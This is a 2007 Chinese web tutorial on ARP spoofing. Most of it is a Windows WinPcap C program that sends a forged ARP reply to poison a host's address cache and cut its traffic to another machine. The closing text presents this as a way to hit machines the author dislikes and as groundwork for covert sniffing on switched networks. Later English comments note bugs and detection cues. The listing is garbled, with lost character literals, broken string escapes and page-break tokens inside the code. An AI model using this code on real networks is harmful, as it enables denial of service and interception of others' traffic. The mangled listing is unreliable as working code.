实例讲解如何对目标进行ARP欺骗
2007-09-01 13:09:49 来源:WEB开发网
这可不是小事。局域网的网络流通可不是根据IP地址进行,而是按照MAC地址进行传输。现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址。现在A开始Ping 192.168.10.3,网卡递交的MAC地址是DD-DD-DD-DD-DD-DD,结果是什么呢?网络不通,A根本不能Ping通C!!这就是一个简单的ARP欺骗。
我们来实现这样的ARP欺骗。这里需要使用一个WinPcap提供的API和驱动。(http://winpcap.polito.it/),winpcap是一个伟大而且开放的项目。Windows环境下的nmap、snort、windump都是使用的winpcap。
// ARP Sender
#include "stdafx.h"
#include "Mac.h" //GetMacAddr(),我写的把字符串转换为MAC地址的函数,就不列在这里了
#include
#include
#define EPT_IP 0x0800 /* EtherType: IPv4; also used below as the ARP protocol type */
#define EPT_ARP 0x0806 /* EtherType: ARP */
#define EPT_RARP 0x8035 /* EtherType: RARP (defined but never used in this listing) */
#define ARP_HARDWARE 0x0001 /* ARP hardware type 1 = Ethernet (the original comment called it a "dummy type for 802.3 frames") */
#define ARP_REQUEST 0x0001 /* ARP opcode: request (never used in this listing) */
#define ARP_REPLY 0x0002 /* ARP opcode: reply - the only opcode main() ever sends */
#define Max_Num_Adapter 10 /* slots in main()'s AdapterList; the adapter counter in main() is never checked against it */
#pragma pack(push, 1)
/* Ethernet (DIX) frame header; 14 bytes under the surrounding #pragma pack(1). */
typedef struct ehhdr
{
unsigned char eh_dst[6]; /* destination MAC address */
unsigned char eh_src[6]; /* source MAC address */
unsigned short eh_type; /* EtherType; main() stores it in network byte order via htons() */
}EHHDR, *PEHHDR;
/*
 * ARP header as laid out on the wire for Ethernet/IPv4.
 * Packed (pack(1)) so that the struct image can be memcpy'd straight into
 * the send buffer. 28 bytes only when unsigned long is 4 bytes (true on
 * Windows/LLP64); on an LP64 platform the two protocol-address fields would
 * be 8 bytes each and the layout would no longer match the wire format.
 */
typedef struct arphdr
{
unsigned short arp_hrd; /* hardware type (network byte order) */
unsigned short arp_pro; /* protocol type (network byte order) */
unsigned char arp_hln; /* hardware address length; main() sets 6 */
unsigned char arp_pln; /* protocol address length; main() sets 4 */
unsigned short arp_op; /* opcode, ARP_REQUEST or ARP_REPLY (network byte order) */
unsigned char arp_sha[6]; /* sender hardware (MAC) address */
unsigned long arp_spa; /* sender protocol (IPv4) address; see size caveat above */
unsigned char arp_tha[6]; /* target hardware (MAC) address */
unsigned long arp_tpa; /* target protocol (IPv4) address; see size caveat above */
}ARPHDR, *PARPHDR;
/* Complete Ethernet + ARP frame image; main() copies it into the send buffer. */
typedef struct arpPacket
{
EHHDR ehhdr; /* Ethernet header */
ARPHDR arphdr; /* ARP payload, immediately following (no padding, pack(1)) */
} ARPPACKET, *PARPPACKET;
#pragma pack(pop)
/*
 * Article demonstration: opens the first WinPcap adapter, builds one forged
 * ARP *reply* (sender = 192.168.10.3 with the MAC parsed from "DDDDDDDDDDDD",
 * target = 192.168.10.1 / the MAC parsed from "AAAAAAAAAAAA") and writes it
 * to the wire. No request precedes the reply, which is precisely what static
 * ARP entries, switch-side dynamic ARP inspection, and IDS rules for
 * unsolicited ARP replies key on.
 *
 * Returns 0 on every path, including all error paths (errors are only printed).
 * On the error paths after PacketAllocatePacket() the packet descriptor and
 * the adapter handle are not released.
 *
 * NOTE: this listing is as extracted from a web page: the character literals
 * in the adapter-name loop and the "\n" escapes inside the string literals
 * were lost, and the "###NextPage###" tokens are pagination residue, not code.
 */
int main(int argc, char* argv[])
{
static char AdapterList[Max_Num_Adapter][1024]; /* adapter-name slots; only slot 0 is ever written (see the copy below) */
char szPacketBuf[600]; /* frame buffer handed to the driver; zeroed below so bytes past the ARP image are 0 */
char MacAddr[6]; /* scratch output of GetMacAddr(), reused for every address */
LPADAPTER lpAdapter;
LPPACKET lpPacket;
WCHAR AdapterName[2048]; /* raw adapter-name list from PacketGetAdapterNames() */
WCHAR *temp,*temp1; /* scan cursor and start-of-current-name cursor */
ARPPACKET ARPPacket; /* frame image, filled field by field below */
ULONG AdapterLength = 1024; /* presumably the buffer size in bytes; smaller than AdapterName actually is (harmless, but confirm against the WinPcap docs) */
int AdapterNum = 0;
int nRetCode, i;###NextPage### /* "###NextPage###" is web pagination residue, not code */
// Get the list of adapters; on failure report and exit (with status 0).
if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
{
printf("Unable to retrieve the list of the adapters!
");
return 0;
}
temp = AdapterName;
temp1=AdapterName;
i = 0;
// Split the name list at its terminator characters (the two literals were
// lost in extraction; WinPcap's convention is NUL-separated names ending in
// a double NUL, so they are presumably '\0' - confirm).
// NOTE: on the first iteration temp == AdapterName, so *(temp-1) reads one
// element before the start of the array (out-of-bounds read).
while ((*temp != )||(*(temp-1) != ))
{
if (*temp == )
{
// NOTE: AdapterList without an index is slot 0, so every name overwrites
// slot 0; the byte count ((temp-temp1) WCHARs * 2) is not bounded to the
// 1024-byte slot either.
memcpy(AdapterList,temp1,(temp-temp1)*2);
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum = i; // names found; only the last one survives in slot 0
// Prints slot 0 AdapterNum times - the loop index does not select a slot.
for (i = 0; i < AdapterNum; i++)
wprintf(L"
%d- %s
", i+1, AdapterList);
printf("
");
//Default open the 0
lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]);
// Use the first adapter (an assumption made by the article).
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
nRetCode = GetLastError(); // reported as hex below
printf("Unable to open the driver, Error Code : %lx
", nRetCode);
return 0;
}
lpPacket = PacketAllocatePacket(); // driver packet descriptor; released at the end on the success path only
if(lpPacket == NULL)
{
printf("
Error:failed to allocate the LPPACKET structure.");
return 0;
}
ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); // the frame is sent as 60 bytes, so the tail past sizeof(ARPPACKET) must be zero rather than stack garbage
// Ethernet destination MAC <- "BBBBBBBBBBBB".
// NOTE: this is the only GetMacAddr() failure that does not return, so on
// failure whatever is in MacAddr is copied. The original comment labelled
// this line "source MAC address", but the field written is eh_dst.
if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))
{
printf ("Get Mac address error!
");
}
memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); // destination MAC (original comment: "source MAC address")
// Ethernet source MAC <- "AAAAAAAAAAAA". The original comment labelled this
// "destination MAC address (A's address)", but the field written is eh_src.
if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
{
printf ("Get Mac address error!
");
return 0;
}
memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); // source MAC (original comment: "destination MAC address (A's address)")
ARPPacket.ehhdr.eh_type = htons(EPT_ARP); // EtherType ARP, network byte order
ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE); // hardware type: Ethernet
ARPPacket.arphdr.arp_pro = htons(EPT_IP); // protocol type: IPv4
ARPPacket.arphdr.arp_hln = 6; // MAC length
ARPPacket.arphdr.arp_pln = 4; // IPv4 length
ARPPacket.arphdr.arp_op = htons(ARP_REPLY); // unsolicited reply - no request is ever sent
// ARP sender hardware address <- "DDDDDDDDDDDD": the MAC the reply attributes to C.
if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))
{
printf ("Get Mac address error!
");
return 0;
}
memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6); // forged MAC address for C
ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3"); // C's IP address (already network byte order from inet_addr)
// ARP target hardware address <- A's MAC (the same string used for eh_src above).
if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
{
printf ("Get Mac address error!
");
return 0;
}
memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6); // target A's MAC address
ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1"); // target A's IP address
memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket)); // struct image into the zeroed send buffer
PacketInitPacket(lpPacket, szPacketBuf, 60); // 60 bytes on the wire, more than sizeof(ARPPACKET); the rest is zero padding (presumably to reach the minimum Ethernet frame size - confirm)
// Asks the driver to repeat the write 2 times (WinPcap PacketSetNumWrites semantics - confirm); failure is only a warning.
if(PacketSetNumWrites(lpAdapter, 2)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!
");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE) // TRUE: synchronous write, per the WinPcap API
{
printf("Error sending the packets!
");
return 0;
}
printf ("Send ok!
");###NextPage### /* "###NextPage###" is web pagination residue, not code */
// close the adapter and exit (success path only; the error returns above leak both handles)
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return 0;
}
于是A接收到一个被伪造的ARP应答。A被欺骗了!!倘若在局域网中看某某机器不顺眼,以太网中的嗅探太有作用了,但是交换网络对嗅探进行了限制,让嗅探深入程度大打折扣。不过,很容易就能够发现,主机、Switch(动态更新地址表类型,下同)中的缓存表依然是(主要是)动态的。要在一个交换网络中进行有效的嗅探工作(地下党?),需要采用对付各种缓存表的办法,连骗带哄,甚至乱踹,在上面的ARP欺骗基础中我们就能够做到。